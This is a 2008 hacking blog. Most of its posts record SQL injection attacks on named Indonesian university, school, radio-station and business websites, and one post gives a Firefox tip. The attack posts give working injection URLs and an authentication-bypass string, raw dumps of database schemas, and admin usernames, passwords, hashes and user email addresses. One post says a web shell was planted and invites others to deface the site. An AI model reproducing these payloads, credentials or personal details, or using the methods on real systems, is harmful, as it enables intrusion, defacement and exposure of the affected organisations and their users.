viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, September 30, 2008

[SQLi] http://kemahasiswaan.umm.ac.id

8:09 PM Posted by viperfx07 No comments
login info (usr:pwd) = athox:mayax
I think it can be the exploit for the root domain, too.
[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Showing Tables & Columns from database "kemahasiswaan"
[+] 17:03:41
[+] Number of Tables: 7

[Database]: kemahasiswaan
[Table: Columns]
[0]admin: id_user,user,password,nama,status,level
[1]agenda: id_agenda,judul,tanggal,agenda_awal,agenda_akhir
[2]beasiswa: id_beasiswa,judul,tanggal,beasiswa
[3]berita: id_berita,judul,tanggal,berita_awal,berita_akhir
[4]level: id_level,level
[5]lowongan: id_lowongan,judul,tanggal,lowongan
[6]menu: id_menu

[-] [17:03:55]
[-] Total URL Requests 28
[-] Done

|---------------------------------------------------------------|

[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Dumping data from database "kemahasiswaan" Table "admin"
[+] Column(s) ['user', 'password']
[+] 17:04:14
[+] Number of Rows: 5

[0] athox:mayax:
[1] clock:defist:
[2] santoso:suga:
[3] heru:heru:
[4] jokosis:jokosis:

[-] [17:04:16]
[-] Total URL Requests 6
[-] Done

http://www.jayabaya.ac.id vulnerability

1:58 AM Posted by viperfx07 No comments
Instead of SQL injection, i try to explore some vulnerability like the previous one from polri.go.id. If you go to http://www.jayabaya.ac.id/infoshow.php?id= you will see an error message.Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jayabaya/public_html/info/infoisi.php on line 6 MySQL v4 is so tiring, so i left it for now.
There is a directory called info there. So let's check it out.
admin/ 01-Jun-2008 02:39 -
connect.php 21-Dec-2007 08:36 1k
info_lead.php 15-Feb-2006 14:02 1k
infoisi.php 05-Aug-2004 09:10 2k
infolist.php 28-Jan-2004 09:42 1k

Wow, there is an admin directory in the info dir? An idiot developer must be blamed here. ok check the admin directory,
Parent Directory 01-Jun-2008 02:39 -
connect.php 21-Dec-2007 08:36 1k
info_delete.php 28-Jan-2004 09:42 1k
info_edit1.php 20-Jan-2005 12:08 2k
info_edit2.php 28-Jan-2004 09:42 2k
info_edit3.php 28-Jan-2004 09:42 1k
infoform.php 20-Jan-2005 12:38 2k
infoinput.php 28-Jan-2004 09:42 1k

Try them one by one. The interesting one is the info_edit2.php. You can edit any info in that site with this. try http://www.jayabaya.ac.id/info/admin/info_edit2.php?id=3 You can add a javascript into the title or the body of this info. But unfortunately, you can't upload a shell to bring more destruction :(

Monday, September 29, 2008

[SQLi]http://www.unitomo.ac.id/

8:08 PM Posted by viperfx07 No comments
go to http://alumni.unitomo.ac.id.
login info: labtek:1206.
PoC: http://unitomo.ac.id/berita.php?id=-360+union+select+1,concat_ws(0x10,login,password),3,4,5,6,7+from+unitomo.user--

So many databases can be accessed from this site. Idiot admin :)

Database: alumni
backup_blog
blogfe
blogfh
blogfia
blogfikom
blogfkip
blogfp
blogfs
blogft
bloggalery
bloglppm
blogpasca
blogperpus
blogunitomo
bursakerja
cdcol
dtiweb
fakultas
moodle
mysql
penelitian
phpmyadmin
test
unitomo

Saturday, September 27, 2008

[SQLi] http://www.mustikafm.com/

8:49 PM Posted by viperfx07 No comments
Admin Dir: http://www.mustikafm.com/v1/admin/
Admin Login: admin:mstk
Dump:
[+] URL:http://www.mustikafm.com/v1/perempuan.php?id=-7+union+select+darkc0de,2,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mustika_proyek
User: mustika_proyek@localhost
Version: 4.1.22-standard
[+] Dumping data from database "mustika_proyek" Table "users"
[+] Column(s) ['username', 'password', 'email']
[+] 17:49:16
[+] Number of Rows: 11

[0] 21232f297a57a5a743894a0e4a801fc3:199087666927341b2ccaec076263161d:admin@your-site.com:
[1] fef747846c2e2b36ac157c1f1c89e252:fef747846c2e2b36ac157c1f1c89e252:ekamusik@yahoo.com:
[2] d320cc230f9c210cecf5fe62ee7782a1:32539e859dcf086f35c4d285fda4cc7d:dewa_tirta@yahoo.com:
[3] e14499f48d92e45033f75127dd1517d6:cd8c42d66b8fdc7e465d79befaae90ad:reynard_18525@yahoo.com:
[4] ce0e5bf55e4f71749eade7a8b95c4e46:6f02fc611389f0787afe47d2d9b2cf58:addi@yahoo.com:
[5] 14df7a01052b5c316710a89d76ed5f20:71c6ec9db58b26798b2f110fe23c9067:kukuh28@yahoo.com:
[6] 544c66afd8b8fb1e0951aaf52691625a:f6a478734e11515faf9ac416a7055fb8:marco_melandri69@yahoo.com:
[7] 1db8b3fb3b05968e52e91f61b59880be:79ace9ee2a68fcee77ac1ff892031ad2:pakroby@yahoo.com:
[8] 8e1f3229001f29ca60d3f4b6d834763a:4eb0b078098e5b2b4dc3b4fbb7f51b25:warehouse_syndicate@yahoo.com:
[9] 3d18f640a9f43b025a3ac9976b763858:d41d8cd98f00b204e9800998ecf8427e:aGoenk_scream@yahoo.co.id:
[10] 082dc9804a49a6a6b786b08171241937:931d110ca11b412d71b1c3fd8e8904c2:aguspras@asei.co.id:

[-] [17:49:18]
[-] Total URL Requests 12
[-] Done

[SQLi] http://www.eljohn.net/

7:38 PM Posted by viperfx07 No comments
Admin Dir = http://www.eljohn.net/
Admin Login = admin:admin. idiot admin :)

[+] URL:http://www.eljohn.net/pusat/data_pusat.php?level=1&dir_id=6&dir_id0=-5%20union%20select%201,2,darkc0de,4,5
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h18416_info2
User: h18416_nch2@localhost
Version: 5.0.32-Debian_7etch6
[+] 16:18:20[Database]: h18416_info2
[Table: Columns]
[0]agenda: id,id_prov,agenda,memo,tanggal,contact_name,contact_phone,contact_mail
[1]agenda_wisata: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,catching,isi,user_id,tanggal_mulai,tanggal_akhir,tanggal_update
[2]ambil_email: email
[3]banner_dalam_direktori: id,id_direktori,banner,nama,website,keterangan,tgl_aktif,tgl_habis,tgl_update
[4]banner_iklan: id,banner,nama,website,keterangan,tgl_aktif,tgl_habis,tgl_update
[5]berita_hari_ini: news_id,news_prov,news_topic,news_catching,news_content,news_keyword,news_editdate,news_image1,news_image2,news_image3,news_image4,news_image5,news_reporter,tanggal_view,waktu_view,id_direktori
[6]daftar_klien: id,nama,website,keterangan,tgl_aktif,tgl_habis,tgl_update
[7]data_direktori: parent_id,child_id,name,flag,tanggal
[8]data_direktori_kabupaten: parent_id,child_id,name,flag,tanggal
[9]data_direktori_kota: parent_id,child_id,name,flag,tanggal
[10]data_direktori_propinsi: parent_id,child_id,name,flag,tanggal
[11]data_direktori_temp: id_direktori,nm_direktori
[12]direktori_field_kabupaten: id,id_direktori,id_kabupaten,title,memo,website,contact_name,contact_phone,contact_mail,user_id,tanggal_input,gambar,keyword,hit,id_user,tanggal_data,id_direktori_pusat,level
[13]direktori_field_kabupaten_banner: id,id_kabupaten,banner,website
[14]direktori_field_kabupaten_berita: news_id,news_id_kabupaten,news_topic,news_catching,news_content,news_keyword,news_editdate,news_image1,news_image2,news_image3,news_image4,news_image5,news_reporter,tanggal_view,waktu_view
[15]direktori_field_kabupaten_halaman_depan: id,id_kabupaten,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[16]direktori_field_kabupaten_kontak: id,id_kabupaten,nama,alamat1,alamat2,email,telp,fax,hp
[17]direktori_field_kabupaten_tentang_kami: id,id_kabupaten,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[18]direktori_field_kota: id,id_direktori,id_kota,title,memo,website,contact_name,contact_phone,contact_mail,user_id,tanggal_input,gambar,keyword,hit,id_user,tanggal_data,id_direktori_pusat,level
[19]direktori_field_kota_banner: id,id_kota,banner,website
[20]direktori_field_kota_berita: news_id,news_id_kota,news_topic,news_catching,news_content,news_keyword,news_editdate,news_image1,news_image2,news_image3,news_image4,news_image5,news_reporter,tanggal_view,waktu_view
[21]direktori_field_kota_halaman_depan: id,id_kota,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[22]direktori_field_kota_kontak: id,id_kota,nama,alamat1,alamat2,email,telp,fax,hp
[23]direktori_field_kota_tentang_kami: id,id_kota,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[24]direktori_field_propinsi: id,id_direktori,id_propinsi,title,memo,website,contact_name,contact_phone,contact_mail,user_id,tanggal_input,gambar,keyword,hit,id_user,tanggal_data,id_direktori_pusat,level
[25]direktori_field_propinsi_banner: id,id_propinsi,banner,website
[26]direktori_field_propinsi_berita: news_id,news_id_propinsi,news_topic,news_catching,news_content,news_keyword,news_editdate,news_image1,news_image2,news_image3,news_image4,news_image5,news_reporter,tanggal_view,waktu_view
[27]direktori_field_propinsi_halaman_depan: id,id_propinsi,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[28]direktori_field_propinsi_kontak: id,id_propinsi,nama,alamat1,alamat2,email,telp,fax,hp
[29]direktori_field_propinsi_tentang_kami: id,id_propinsi,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[30]direktori_field_pusat: id,id_direktori,title,memo,website,contact_name,contact_phone,contact_mail,user_id,tanggal_input,gambar,keyword,hit,id_user,tanggal_data,id_direktori_pusat,level
[31]direktori_field_pusat_banner: id,id_pusat,banner,website
[32]direktori_field_pusat_berita: news_id,news_id_pusat,news_topic,news_catching,news_content,news_keyword,news_editdate,news_image1,news_image2,news_image3,news_image4,news_image5,news_reporter,tanggal_view,waktu_view
[33]direktori_field_pusat_halaman_depan: id,id_pusat,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[34]direktori_field_pusat_kontak: id,id_pusat,nama,alamat1,alamat2,email,telp,fax,hp
[35]direktori_field_pusat_tentang_kami: id,id_pusat,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi
[36]direktori_rekap_per_user: user_id,pusat,propinsi,kota,kabupaten
[37]ecard_category: ctg_id,ctg_name,ctg_flag
[38]ecard_image: image_id,image_ctg,image_name,upload_date,image_flag
[39]ecard_send: id,image,from_name,from_email,to_email,date_send,warna_latar,isi_kartu,card_flag
[40]fitur_cinderamata: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,catching,isi,user_id,tanggal_mulai,tanggal_akhir,tanggal_update
[41]fitur_merchant: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,catching,isi,user_id,tanggal_mulai,tanggal_akhir,tanggal_update
[42]fitur_merchant_detail: id,id_fitur,id_ktg,image,site,tgl_mulai,tgl_akhir
[43]fitur_merchant_kategori: id,name,flag
[44]fitur_piranti: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,catching,isi,user_id,tanggal_mulai,tanggal_akhir,tanggal_update
[45]fitur_profil: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,catching,isi,user_id,tanggal_mulai,tanggal_akhir,tanggal_update,member_kode
[46]forum_post: post_id,topic_id,poster,post_time,email,web
[47]forum_postext: post_id,post_text
[48]forum_smile: id,code,smile_url,emotion
[49]forum_topic: topic_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_last_post_id
[50]foto_hari_ini: id,image,memo,tanggal,jam,id_direktori
[51]hit_total: tanggal,jam,jumlah,tanggal2
[52]jejak_pendapat: id,judul,pilihan01,pilihan02,pilihan03,pilihan04
[53]jejak_pendapat_result: id,hasil1,hasil2,hasil3,hasil4
[54]kabupaten: id,id_prop,kode,kab_name,ibu_kota
[55]komunitas_bursa_fungsi: id,name
[56]komunitas_bursa_industri: id,name
[57]komunitas_bursa_jabatan: id,name
[58]komunitas_bursa_lowongan: id_lowongan,id_perusahaan,id_jabatan,id_fungsi,lokasi_kerja,pendidikan,jurusan,pengalaman_kerja,jenis_kelamin,gaji_ditawarkan,persyaratan,deskripsi,tgl_pemasangan,tgl_penutupan
[59]komunitas_bursa_pekerja: id_pekerja,nama_pekerja,tempat_lahir,tanggal_lahir,umur,kewarganegaraan,jenis_kelamin,alamat_pekerja,pendidikan,jurusan,lokasi,no_telp,no_fax,no_hp,email,foto,riwayat_hidup,ketrampilan_khusus,pengalaman_kerja_tahun,pengalaman_kerja_bulan,riwayat_pekerjaan,perusahaan_terakhir,gaji_terakhir,id_jabatan,id_fungsi,website,tanggal
[60]komunitas_bursa_pendidikan: id,name
[61]komunitas_bursa_perusahaan: id_perusahaan,id_user,nama_perusahaan,logo_perusahaan,alamat_perusahaan,deskripsi_perusahaan,site_perusahaan,id_industri,kontak_perusahaan,no_telp,no_fax,email,tanggal
[62]komunitas_bursa_resume: id_pekerja,keterangan,id
[63]komunitas_online: user_id,host,ip,time
[64]komunitas_pesan: room_id,user_id,tanggal,pesan
[65]komunitas_room: room_id,room_class,room_name,room_pwd
[66]komunitas_room_user: user_id,room_id,room_pwd
[67]komunitas_user: id,user_nma,user_pwd,nick_name,mail,phone
[68]kota: id,id_prop,kode,kota_name,ibu_kota
[69]link_lainnya: id,link_name,link_url,link_desc
[70]mail_list_nama: id,nama,diskripsi,moderator,flag,tanggal
[71]member_user: member_id,member_user,member_pwd,member_name,member_mail,member_kode
[72]online: host,ip,time
[73]propinsi: id,prov_code,singkatan,prov_name,prov_kota,prov_memo
[74]running_text: id,text,tanggal_mulai,tanggal_akhir
[75]travel_pesawat: id,id_pesawat,class,flightnum,relasi,departure,arrival,curr,oneway,return,keterangan,flag
[76]travel_pesawat_list: id,nama,flag
[77]user: id,user_id,user_pwd,user_name,mail,otority,status
[78]wisata_art_culture: id,judul,tanggal1,tanggal2,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id
[79]wisata_bioskop_film: id,judul,gambar1,sinopsis,flag
[80]wisata_bioskop_gedung: id,nama,id_kota,id_kabupaten,alamat,telepon,htm,nomat
[81]wisata_bioskop_jadwal: id,id_gedung,id_film,studio,jam1,jam2,jam3,jam4,jam5,special1,special2,tanggal_mulai,tanggal_akhir
[82]wisata_kuliner: id,judul,tanggal,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id,tanggal_edit
[83]wisata_promo: id,judul,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id,tanggal_mulai,tanggal_akhir
[84]wisata_review: id,judul,tanggal,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id,tanggal_edit
[85]wisata_story: id,judul,tanggal,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id,tanggal_edit,kirim,nama,email,telp
[86]wisata_tips: id,judul,tanggal,gambar1,gambar2,gambar3,gambar4,gambar5,isi,user_id,tanggal_edit,kirim,nama,email,telp

[-] [16:23:57]
[-] Total URL Requests 713
[-] Done

[SQLi] http://www.sonora.co.id

6:49 PM Posted by viperfx07 No comments
PoC: http://www.sonora.co.id/page.php?m=jaringan&i=-1+union+select%201,2,3,4,5,6,7,unhex(hex(concat_ws(0x10,user,password))),9,10,11,12,13,14,15,16+from+mysql.user--

Problem: still don't know what to do here :) mysql v4 prevented me to extract the database. Admin directory location is still unknown.

Database info:Database: sonora_web
User: aha@localhost
Version: 4.1.7-nt

[SQLi] http://www.mstrifm.com

6:27 PM Posted by viperfx07 No comments
Problem: where is the admin directory? i juz go to /config, and the username & passwd used there is not from the mysql table.

Database info:Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log
Dump:

[+] URL:http://www.mstrifm.com/berita.php?id=-69+union+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log
[+] Showing Tables & Columns from database "mstri_mstri"
[+] 14:44:30
[+] Number of Tables: 29

[Database]: mstri_mstri
[Table: Columns]
[0]about: id,about_head_id,about,about_en
[1]about_head: about_head_id,about_head,about_head_en
[2]admin: id,name,password,last_login,status
[3]aktivitas: aktivitas_id,aktivitas_title,aktivitas_title_en,place_n_time,aktivitas_desc,aktivitas_desc_en,status
[4]aktivitas_image: aktivitas_image_id,aktivitas_id,aktivitas_image_name,aktivitas_image_desc,aktivitas_image_desc_en,image_type
[5]aktivitas_upcoming: aktivitas_upcoming_id,aktivitas_upcoming,aktivitas_upcoming_en,aktivitas_upcoming_place_n_time,aktivitas_upcoming_registrasi,aktivitas_upcoming_registrasi_en,aktivitas_upcoming_closed
[6]banner_baris: id,title,title_en,description,description_en,link,status
[7]banner_bottom: id,name,link,status
[8]banner_top: id,image_name,link,status
[9]banner_trisakti: id,image_name,link,status
[10]bursa_akademia: id,nama,telp,deskripsi,waktu,status
[11]crew: crew_id,crew_name,friendster_link,crew_image,image_type,status
[12]cv: id,nama,gender,dob,alamat,telp,hp,email,pendidikan,pend_lain,institusi,jurusan,posisi,about_me,alasan,image,waktu
[13]details: id,millist,millist_link,email,phone,fax,request_sms,request_phone1,request_phone2,iklan_tahun,iklan_efektif,iklan_efektif_en,iklan_spot,iklan_discount,alf_phone,alf_email
[14]iklan: id,iklan_head_id,durasi,durasi_en,prime,regular
[15]iklan_head: iklan_head_id,iklan_head,iklan_head_en
[16]iklan_time: id,prime,regular1,regular2
[17]iklan_time_head: iklan_time_id,prime,prime_en,regular1,regular1_en,regular2,regular2_en
[18]kritik_dan_saran: id,nama,email,deskripsi,waktu,ip
[19]news: news_id,news_title,news_title_en,news_short_desc,news_short_desc_en,news_content,news_content_en,news_time,author,image,image_type,status
[20]polling: polling_option_id,polling_option,polling_option_en,voted
[21]polling_question: polling_id,polling_question,polling_question_en,polling_closed
[22]programs: programs_id,days_id,programs_time,programs_name,programs_name_en,programs_short_desc,programs_short_desc_en,programs_desc,programs_desc_en,image
[23]programs_special: id,nama,nama_en,waktu,waktu_en,programs_desc,programs_desc_en,image,status
[24]request: request_id,nama,alamat,telp,email,artist,song,untuk,jam,hari,time_entered,status
[25]request_history: id,request_id,nama,alamat,telp,email,artist,song,untuk,jam,hari,time_entered,status
[26]running_text: id,running_text,running_text_en
[27]streaming_link: id,image_name,link,status
[28]topten: chart_no

[-] [14:45:52]
[-] Total URL Requests 195
[-] Done
[+] URL:http://www.mstrifm.com/berita.php?id=-69+union+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log
[+] Dumping data from database "mstri_mstri" Table "admin"
[+] Column(s) ['id', 'name', 'password']
[+] 14:46:47
[+] Number of Rows: 10

[0] 1:fajar:891d08754b7747fd368d3b0c65e5171a
[1] 2:alfin:891d08754b7747fd368d3b0c65e5171a
[2] 3:vanda:891d08754b7747fd368d3b0c65e5171a
[3] 4:ita:891d08754b7747fd368d3b0c65e5171a
[4] 6:dakka:2ecd36883a04f211775f2ea429646698
[5] 7:aca:891d08754b7747fd368d3b0c65e5171a
[6] 8:hendra:22284fb6df76e1af976ca914db3ece20
[7] 10:petunia:petunia
[8] 11:null-ident:81dc9bdb52d04dc20036dbd8313ed055
[9] 12:wiflRmitye:0eeb41fdd1c7ec4b7f2c14982f443056

[-] [14:46:50]
[-] Total URL Requests 11
[-] Done

Thursday, September 25, 2008

Making the backspace key in Firefox a shortcut key to go back in Ubuntu!

11:40 PM Posted by viperfx07 No comments
Coming from Windows a few months ago, one of the things I took for granted was the backspace key being a shortcut key for the back button on my web browser - Firefox.

Once I shifted over to Ubuntu, this shortcut was missing from a default installation.

If you want to replicate how the Firefox web browser on Windows has mapped the backspace key to go back a page on linux based systems, do the following:

* Open up firefox
* In the address bar, type about:config *this should give you a payload of preferences going down the page*
* Once this happens, enter the word “backspace” in the filter field, this should narrow your entry to one that says browser.backspace_action.
* Double click on the entry and change the value to 0 instead of 1.

The change should be immediate, so if you now press the [Backspace] key, it functions as a back button. I must have done this a several times when I was installing and reinstalling distributions as I messed around with my installations, but kept forgetting how to do it. :)

So this is more a quick note than any ground breaking hack.

Wednesday, September 24, 2008

[SQLi] http://law.ui.ac.id

6:06 PM Posted by viperfx07 No comments
login= username:passwd = admin:admiN
Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of below restriction)

[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw

Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--

I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'



Dump:


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!

[14:30:33] StartTime
[+] Fuzzing Tables...

[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id

[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4

[0]: admin:admiN

[SQLi] http://www.smanu1-gsk.sch.id

2:43 PM Posted by viperfx07 No comments
username:passwd = ADMIN:105452



Website: http://www.smanu1-gsk.sch.id
Tool: schemafuzz.py (wow, it's a great tool. I should use it instead of blindext.py)


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[-] Done



[Database]: t84036_smanu
[Table: Columns]
[0]agenda_: id_,judul_item_,item_,tanggal_
[1]alumni_: id_,nama_,tempat_lahir_,tanggal_lahir_,jurusan_,angkatan_,alamat_rumah_,telp_rumah_,perusahaan_,alamat_perusahaan_,telp_perusahaan_,jabatan_,email_
[2]artikel_: id_,judul_menu_,judul_item_,link_,aktif_,tanggal_aktif_
[3]berita_: id_,judul_item_,gambar_,sinopsis_,item_,pembuat_,tanggal_buat_,aktif_,tanggal_aktif_
[4]chat_: id_,nama_,email_,pesan_
[5]dual: dum
[6]fasilitas_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[7]galery_: id_,judul_item_,tanggal_,link_,pembuat_,komentar_
[8]hak_akses_: pengguna_,site_map_
[9]jurusan_: id_,nama_,tanggal_mulai_,tanggal_akhir_
[10]pengajar_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[11]pengguna_: id_,nama_,nama_lengkap_,kunci_,level_
[12]pengumuman_: id_,judul_menu_,judul_item_,nama_panggil_,nama_sukses_,nama_gagal_,keterangan_1,keterangan_2,keterangan_3,full_,contoh_,aktif_,tanggal_aktif_
[13]pengumuman_det_: id_,id_grp_,nomor_,keterangan_1,keterangan_2,keterangan_3
[14]profile_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[15]siswa_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[16]site_map_: id_

[-] [11:33:23]
[-] Total URL Requests 107
[-] Done


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "t84036_smanu" Table "pengguna_"
[+] Column(s) ['id_', 'nama_', 'kunci_', 'level_']
[+] 11:35:21
[+] Number of Rows: 6

[0] 1:ADMIN:105452:0:
[1] 3:AAN:tyasku:1:
[2] 4:KHULUK:111000:0:
[3] 9:INFO:info:1:
[4] 10:BK:bksmanusa:1:
[5] 8:MK_KHULUK:111000:0:

[-] [11:35:24]
[-] Total URL Requests 7
[-] Done

Monday, September 22, 2008

Sunday, September 21, 2008

[SQLi] http://www.obengware.com

10:57 PM Posted by viperfx07 No comments
admin username = admin
admin passwd = 15287232

Problem: where is the admin directory?


[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 21:38:25
[0]: 5.0.32-Debian_7etch6:t31237_news@localhost:t31237_news

[-] 21:52:57
[-] Total URL Requests 388
[-] Done

[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t31237_news"
[+] 21:41:13
[+] Number of Rows: 18

[0]: articles
[1]: ban_group
[2]: ban_source
[3]: categories
[4]: comments
[5]: newsletter
[6]: poll
[7]: poll_ip
[8]: poll_result
[9]: properties
[10]: rating
[11]: session
[12]: session_detail
[13]: styles
[14]: sub_categories
[15]: topmenu
[16]: users
[17]: visitors

[-] 22:31:01
[-] Total URL Requests 1237
[-] Done


[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t31237_news" Table "users"
[+] Column(s) ['username', 'password', 'root']
[+] 22:55:05
[+] Number of Rows: 2

[0]: admin:fbf21ad480de232810e70a7698e627c6:0
[1]: news:acc27bdc9f7dafd9e2f43945fd692dca:0

Friday, September 19, 2008

[SQLi] http://career.sbm.itb.ac.id/

5:42 PM Posted by viperfx07 No comments
Yeah, at last, find an easy sql injection :D

Website: http://career.sbm.itb.ac.id/
Bug: SQL injection
Tool: -




Method: ' or 'a'='a on login & password textbox

You can deface it by uploading the shell like c99, r57, etc. Here, i have injected the shell. Juz do the rest :D


Thursday, September 18, 2008

[SQLi] http://www.unesa.ac.id

9:37 PM Posted by viperfx07 No comments
admin username = ari
admin password = unesah

Problem: Where is the admin directory?

Website:http://www.unesa.ac.id
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 17:45:33
[+] Number of Rows: 1

[0]: webunesa

[-] 17:46:20
[-] Total URL Requests 80
[-] Done



[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!

[17:46:30] StartTime
[+] Fuzzing Tables...

[Table]:user
[Column]:passwd
[Column]:id
[Column]:email
[Column]:login

[17:47:26] EndTime
[-] Total URL Requests 227
[-] Done



[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "webunesa" Table "user"
[+] Column(s) ['passwd', 'id', 'email', 'login']
[+] 17:47:56
[+] Number of Rows: 15

[0]: a456cd1f2bb4665b380ad93060b977b1:111:soboparan@yahoo.com:ari
[1]: 4ea43e57d6f0054756af707ba44e85cc:111::pasca
[2]: 25eb39c0affd2939b4291d4141c4cb5b:111:alim_sumarno@yahoo.com:alim

I terminated here because it took a long time :). The admin is in the first row.

[SQLi] http://www.fti-tarumanagara.or.id

9:20 PM Posted by viperfx07 No comments
Another victim :D

Website: http://www.fti-tarumanagara.or.id
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 12:02:19
[0]: 5.0.18-nt:root@localhost:dbfti

[-] 12:03:12
[-] Total URL Requests 220
[-] Done




[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 11:54:38
[+] Number of Rows: 24

[0]: Copy of dbskripsi
[1]: Copy of kp_db
[2]: Copy of labfti
[3]: alumniuntar
[4]: builderdb
[5]: cdcol
[6]: data
[7]: dbfti
[8]: dbseminar
[9]: dbskripsi
[10]: dbskripsi_onupdate
[11]: dbsnti
[12]: dbwebsitenews
[13]: helpdesk
[14]: kp_db
[15]: kp_db_test
[16]: labfti
[17]: mysql
[18]: nontemplatedb
[19]: phpmyadmin
[20]: templatedb
[21]: templateuserdb
[22]: test
[23]: webauth

[-] 12:02:28
[-] Total URL Requests 1787
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "dbfti"
[+] 12:03:25
[+] Number of Rows: 18

[0]: tbbanner
[1]: tbbidpenelitian
[2]: tbevents
[3]: tbfavlinks
[4]: tbjurnalilmiah
[5]: tbmatakuliah
[6]: tbmatakuliahpil
[7]: tbmatakuliahsilabus
[8]: tbmember
